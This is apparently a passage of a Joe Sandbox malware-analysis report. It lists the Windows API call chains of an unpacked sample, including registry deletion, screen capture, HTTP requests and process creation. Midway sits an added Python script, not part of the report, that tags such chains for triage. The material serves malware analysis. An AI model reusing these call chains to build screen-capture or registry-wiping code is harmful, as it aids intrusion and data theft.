              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
              • API String ID: 66158676-1714406822
              • Opcode ID: 6bd65af9ed493c8fa03855f3d70aad972db18e670e984b24461f714dbbb2fee1
              • Instruction ID: e24a7f522972086bf83ff5013222f03e4ca6482920ad853d092288d3f28995da
              • Opcode Fuzzy Hash: 6bd65af9ed493c8fa03855f3d70aad972db18e670e984b24461f714dbbb2fee1
              • Instruction Fuzzy Hash: D1210E726457196BFB11ABF4AC05B7A3396EB46B51F104539FD0293392DFBC6C008A98
              APIs
              • CharLowerBuffW.USER32(00000000,00000000,0076CC08), ref: 00744527
              • _wcslen.LIBCMT ref: 0074453B
              • _wcslen.LIBCMT ref: 00744599
              • _wcslen.LIBCMT ref: 007445F4
              • _wcslen.LIBCMT ref: 0074463F
              • _wcslen.LIBCMT ref: 007446A7
                • Part of subcall function 006EF9F2: _wcslen.LIBCMT ref: 006EF9FD
              • GetDriveTypeW.KERNEL32(?,00796BF0,00000061), ref: 00744743
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharDriveLowerType
              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
              • API String ID: 2055661098-1000479233
              • Opcode ID: 2ff707f14f4fd79194ab6d13c4dbddac39cc9da941895c77acb8ac107f70ef58
              • Instruction ID: f34687a7da7809d218eba8213f9a73587bcce700bb4f577d60b9a33e96ab7d58
              • Opcode Fuzzy Hash: 2ff707f14f4fd79194ab6d13c4dbddac39cc9da941895c77acb8ac107f70ef58
              • Instruction Fuzzy Hash: D0B1F2716083029FC710DF28D890A7AB7E5BFA6760F504A1DF496C7291EB38D845DBA2
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • DragQueryPoint.SHELL32(?,?), ref: 00769147
                • Part of subcall function 00767674: ClientToScreen.USER32(?,?), ref: 0076769A
                • Part of subcall function 00767674: GetWindowRect.USER32(?,?), ref: 00767710
                • Part of subcall function 00767674: PtInRect.USER32(?,?,00768B89), ref: 00767720
              • SendMessageW.USER32(?,000000B0,?,?), ref: 007691B0
              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007691BB
              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007691DE
              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00769225
              • SendMessageW.USER32(?,000000B0,?,?), ref: 0076923E
              • SendMessageW.USER32(?,000000B1,?,?), ref: 00769255
              • SendMessageW.USER32(?,000000B1,?,?), ref: 00769277
              • DragFinish.SHELL32(?), ref: 0076927E
              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00769371
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#z
              • API String ID: 221274066-3231298687
              • Opcode ID: 756ad91427686e561ccce6e17cecd414268d9a8f7f0373d83dae252c36d10f58
              • Instruction ID: 20594622f7e8b337e6cbfa15bc3dedc2908bf26f51c96fc560a9fcf049e175f2
              • Opcode Fuzzy Hash: 756ad91427686e561ccce6e17cecd414268d9a8f7f0373d83dae252c36d10f58
              • Instruction Fuzzy Hash: 8E619B71508301AFC701DF60DC85DAFBBE9EFC9750F00492EF596922A0DB749A09CB66
              APIs
              • _wcslen.LIBCMT ref: 0075B198
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0075B1B0
              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0075B1D4
              • _wcslen.LIBCMT ref: 0075B200
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0075B214
              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0075B236
              • _wcslen.LIBCMT ref: 0075B332
                • Part of subcall function 007405A7: GetStdHandle.KERNEL32(000000F6), ref: 007405C6
              • _wcslen.LIBCMT ref: 0075B34B
              • _wcslen.LIBCMT ref: 0075B366
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0075B3B6
              • GetLastError.KERNEL32(00000000), ref: 0075B407
              • CloseHandle.KERNEL32(?), ref: 0075B439
              • CloseHandle.KERNEL32(00000000), ref: 0075B44A
              • CloseHandle.KERNEL32(00000000), ref: 0075B45C
              • CloseHandle.KERNEL32(00000000), ref: 0075B46E
              • CloseHandle.KERNEL32(?), ref: 0075B4E3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
              • String ID:
              • API String ID: 2178637699-0
              • Opcode ID: d0b68ff7c879947a88f8e8f596d8488af06611e9f8ae9b90255fec9043e22441
              • Instruction ID: 8a069dc9506b9730d9e87a6e3fe8491c36a3174ce7ac5b834e27a111a506f05e
              • Opcode Fuzzy Hash: d0b68ff7c879947a88f8e8f596d8488af06611e9f8ae9b90255fec9043e22441
              • Instruction Fuzzy Hash: C7F18C31604340DFC764EF24C891B6EBBE1AF85310F14855EF8999B2A2DB75EC48CB96
              APIs
              • GetMenuItemCount.USER32(007A1990), ref: 00712F8D
              • GetMenuItemCount.USER32(007A1990), ref: 0071303D
              • GetCursorPos.USER32(?), ref: 00713081
              • SetForegroundWindow.USER32(00000000), ref: 0071308A
              • TrackPopupMenuEx.USER32(007A1990,00000000,?,00000000,00000000,00000000), ref: 0071309D
              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007130A9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
              • String ID: 0
              • API String ID: 36266755-4108050209
              • Opcode ID: 48c1bc70b071fdbbcfdfe5dda439fcff4eb2da154057c46928184aaa816b0f13
              • Instruction ID: 312b12dc30439dbbb5635d9f7e9a28ea5d2ad112ed8205ad4770f427095123e0
              • Opcode Fuzzy Hash: 48c1bc70b071fdbbcfdfe5dda439fcff4eb2da154057c46928184aaa816b0f13
              • Instruction Fuzzy Hash: FB712A70A44215BEFB218F28CC49FEABF69FF04324F204207F5156A2E1C7B9A965CB55
              APIs
              • DestroyWindow.USER32(?,?), ref: 00766DEB
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00766E5F
              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00766E81
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00766E94
              • DestroyWindow.USER32(?), ref: 00766EB5
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,006D0000,00000000), ref: 00766EE4
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00766EFD
              • GetDesktopWindow.USER32 ref: 00766F16
              • GetWindowRect.USER32(00000000), ref: 00766F1D
              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00766F35
              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00766F4D
                • Part of subcall function 006E9944: GetWindowLongW.USER32(?,000000EB), ref: 006E9952
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
              • String ID: 0$tooltips_class32
              • API String ID: 2429346358-3619404913
              • Opcode ID: 191b8d542b2494c2e41f250a23be50da6f5f320f2bbf34e9c88cdaa78826e270
              • Instruction ID: d87ebba7d47b521b59e25487d28d154e75642803ade32e3ee881fafeca5263a7
              • Opcode Fuzzy Hash: 191b8d542b2494c2e41f250a23be50da6f5f320f2bbf34e9c88cdaa78826e270
              • Instruction Fuzzy Hash: D2716674104340AFEB21CF18D844EBABBE9FB99304F84445EF99A87261C779E916CB19
              APIs
              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0074C4B0
              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0074C4C3
              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0074C4D7
              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0074C4F0
              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0074C533
              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0074C549
              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0074C554
              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0074C584
              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0074C5DC
              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0074C5F0
              • InternetCloseHandle.WININET(00000000), ref: 0074C5FB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
              • String ID:
              • API String ID: 3800310941-3916222277
              • Opcode ID: d3eaba74513dce57d48ef928219fc7d48b4ce0d210665a889e09e64584309048
              • Instruction ID: c7cd51456fce75c2fe57731f67fd84d72ab91f73504c1b401c987aa4210b7f58
              • Opcode Fuzzy Hash: d3eaba74513dce57d48ef928219fc7d48b4ce0d210665a889e09e64584309048
              • Instruction Fuzzy Hash: F9518EB1501308BFDB629F65C948ABBBBFCFF08344F108419F98696210DB78E914DB60
              APIs
              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00768592
              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685A2
              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685AD
              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685BA
              • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685C8
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685D7
              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685E0
              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685E7
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685F8
              • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0076FC38,?), ref: 00768611
              • GlobalFree.KERNEL32(00000000), ref: 00768621
              • GetObjectW.GDI32(?,00000018,?), ref: 00768641
              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00768671
              • DeleteObject.GDI32(?), ref: 00768699
              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007686AF
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
              • String ID:
              • API String ID: 3840717409-0
              • Opcode ID: eb3c30d5affcfa0ccd82823cd27a89650dc7dd919516fa932f8fecbc162b5ce3
              • Instruction ID: 5ebb3cbf9c5c1b90859c4d049f1c11b3e252c764ba5b04a3f02b637f2a98c6dd
              • Opcode Fuzzy Hash: eb3c30d5affcfa0ccd82823cd27a89650dc7dd919516fa932f8fecbc162b5ce3
              • Instruction Fuzzy Hash: A8412875600208AFDB129FA5CC48EAA7BB8FF89B11F108159FD46E7261DB789D01CF25
              APIs
              • VariantInit.OLEAUT32(00000000), ref: 00741502
              • VariantCopy.OLEAUT32(?,?), ref: 0074150B
              • VariantClear.OLEAUT32(?), ref: 00741517
              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007415FB
              • VarR8FromDec.OLEAUT32(?,?), ref: 00741657
              • VariantInit.OLEAUT32(?), ref: 00741708
              • SysFreeString.OLEAUT32(?), ref: 0074178C
              • VariantClear.OLEAUT32(?), ref: 007417D8
              • VariantClear.OLEAUT32(?), ref: 007417E7
              • VariantInit.OLEAUT32(00000000), ref: 00741823
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
              • String ID: %4d%02d%02d%02d%02d%02d$Default
              • API String ID: 1234038744-3931177956
              • Opcode ID: 05228d4c3f8b1cc9573b3d7f44bef767aa7c55e9fb1e4406a7e8f8bc1c33183b
              • Instruction ID: 5e126d131e37f5975fa5dc322948794febb279cdd899d2c5552e4875c3c40ff9
              • Opcode Fuzzy Hash: 05228d4c3f8b1cc9573b3d7f44bef767aa7c55e9fb1e4406a7e8f8bc1c33183b
              • Instruction Fuzzy Hash: 4DD1E271A00219DBDB00FF65D885BB9FBB6BF44700F54815AF446AB280DB38EC91DBA1
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 0075C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075B6AE,?,?), ref: 0075C9B5
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075C9F1
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA68
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA9E
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075B6F4
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075B772
              • RegDeleteValueW.ADVAPI32(?,?), ref: 0075B80A
              • RegCloseKey.ADVAPI32(?), ref: 0075B87E
              • RegCloseKey.ADVAPI32(?), ref: 0075B89C
              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0075B8F2
              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0075B904
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0075B922
              • FreeLibrary.KERNEL32(00000000), ref: 0075B983
              • RegCloseKey.ADVAPI32(00000000), ref: 0075B994
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
              • String ID: RegDeleteKeyExW$advapi32.dll
              • API String ID: 146587525-4033151799
              • Opcode ID: ce366675221b07dc4a002bc98296aed2713ea70288fc0038b65e222dd3ddce04
              • Instruction ID: da68f1e1edd1ca2d0e375a5f745c1c7fdb33612ca775d12da4eda411db99b46f
              • Opcode Fuzzy Hash: ce366675221b07dc4a002bc98296aed2713ea70288fc0038b65e222dd3ddce04
              • Instruction Fuzzy Hash: 5FC16C30604201EFD714DF14C495F6ABBE5AF84319F14859DF89A8B3A2CBB9EC49CB91
              APIs
              • GetDC.USER32(00000000), ref: 007525D8
              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007525E8
              • CreateCompatibleDC.GDI32(?), ref: 007525F4
              • SelectObject.GDI32(00000000,?), ref: 00752601
              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0075266D
              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007526AC
              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007526D0
              • SelectObject.GDI32(?,?), ref: 007526D8
              • DeleteObject.GDI32(?), ref: 007526E1
              • DeleteDC.GDI32(?), ref: 007526E8
              • ReleaseDC.USER32(00000000,?), ref: 007526F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
              • String ID: (
              • API String ID: 2598888154-3887548279
              • Opcode ID: abad569c0cb73a36f770cd24593051f5ec5fc02a5c28297c7d747c7ca9050734
              • Instruction ID: 339b68b6ccc4e8b2b747b313eb488de7da2ea882d66853ce70fb172437d29f44
              • Opcode Fuzzy Hash: abad569c0cb73a36f770cd24593051f5ec5fc02a5c28297c7d747c7ca9050734
              • Instruction Fuzzy Hash: FA6105B5D00219EFCF05CFA4D884AAEBBF5FF48310F208529E956A7251E7B4A941CF94
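The two listings above, one that resolves RegDeleteKeyExW at run time through LoadLibraryA/GetProcAddress and also calls RegDeleteKeyW, and one that copies the screen into a device-independent bitmap through GetDC, CreateCompatibleBitmap, StretchBlt and GetDIBits, are the kind of API chain a triage analyst wants pulled out of a report like this automatically rather than read function by function. The Python script below is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses the report's "• Name.MODULE(args), ref: ADDR" listing format, keeps the "Part of subcall function" inheritance marker, records export names passed literally to GetProcAddress, and tags each function with a small set of ordered capability patterns. The pattern names and their API sets are this example's own assumptions, not Joe Sandbox signatures, and the input is a constructed excerpt copied from the two listings above.

```python
"""Parse Joe Sandbox 'APIs' function listings and tag API call chains.

Added example, not part of the Joe Sandbox report or of its IDA plugin.
The capability patterns are this example's own assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One listed call, e.g. "• StretchBlt.GDI32(?,00000000,...), ref: 0075266D".
# Calls inherited from a callee carry a "Part of subcall function ADDR:" prefix.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Ordered patterns: each step is a set of acceptable API names. Assumed here,
# these are not Joe Sandbox behaviour signatures.
CAPABILITIES = {
    "dynamic import resolution": ({"LoadLibraryA", "LoadLibraryW", "GetModuleHandleW"}, {"GetProcAddress"}),
    "registry key deletion": ({"RegDeleteKeyW", "RegDeleteKeyExW", "RegDeleteValueW"},),
    "screen capture": ({"GetDC", "GetWindowDC"}, {"CreateCompatibleBitmap"}, {"BitBlt", "StretchBlt"}, {"GetDIBits"}),
    "sleep-based timing": ({"timeGetTime", "GetTickCount"}, {"Sleep"}),
}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str                     # call-site address in the memory dump
    from_subcall: Optional[str]  # callee address when inherited, else None


def parse_blocks(text: str) -> List[List[ApiCall]]:
    """Split report text into functions, one per 'APIs' header line."""
    blocks: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            raw = m["args"]
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            current.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
    return blocks


def matches(calls: List[ApiCall], pattern) -> bool:
    """True if the pattern's steps occur, in order, as a subsequence of the calls."""
    names, pos = [c.name for c in calls], 0
    for step in pattern:
        while pos < len(names) and names[pos] not in step:
            pos += 1
        if pos == len(names):
            return False
        pos += 1
    return True


def tag_block(calls: List[ApiCall]) -> List[str]:
    return sorted(cap for cap, pat in CAPABILITIES.items() if matches(calls, pat))


def resolved_imports(calls: List[ApiCall]) -> List[str]:
    """Export names passed to GetProcAddress literally (not '?' or an ordinal)."""
    return [c.args[1] for c in calls if c.name == "GetProcAddress"
            and len(c.args) >= 2 and re.fullmatch(r"[A-Za-z_]\w*", c.args[1])]


# Constructed excerpt, copied from two of the listings in this report.
SAMPLE = """\
APIs
  • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075C9F1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075B772
• RegDeleteValueW.ADVAPI32(?,?), ref: 0075B80A
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 0075B8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0075B904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0075B922
• RegCloseKey.ADVAPI32(00000000), ref: 0075B994
Strings
Memory Dump Source
APIs
• GetDC.USER32(00000000), ref: 007525D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007525E8
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0075266D
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007526D0
• ReleaseDC.USER32(00000000,?), ref: 007526F3
"""

if __name__ == "__main__":
    for block in parse_blocks(SAMPLE):
        print(block[0].ref, tag_block(block), resolved_imports(block))
```

The patterns are matched as ordered subsequences, so an unrelated call between two steps (CreateCompatibleDC and SelectObject in the real listing) does not break the match, while the order itself still has to hold. Inherited subcall lines are kept in the sequence because a capability that lives one frame down is still reachable from the function being examined; drop them by filtering on `from_subcall is None` if you only want direct calls.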
              APIs
              • ___free_lconv_mon.LIBCMT ref: 0070DAA1
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D659
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D66B
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D67D
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D68F
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6A1
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6B3
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6C5
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6D7
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6E9
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6FB
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D70D
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D71F
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D731
              • _free.LIBCMT ref: 0070DA96
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
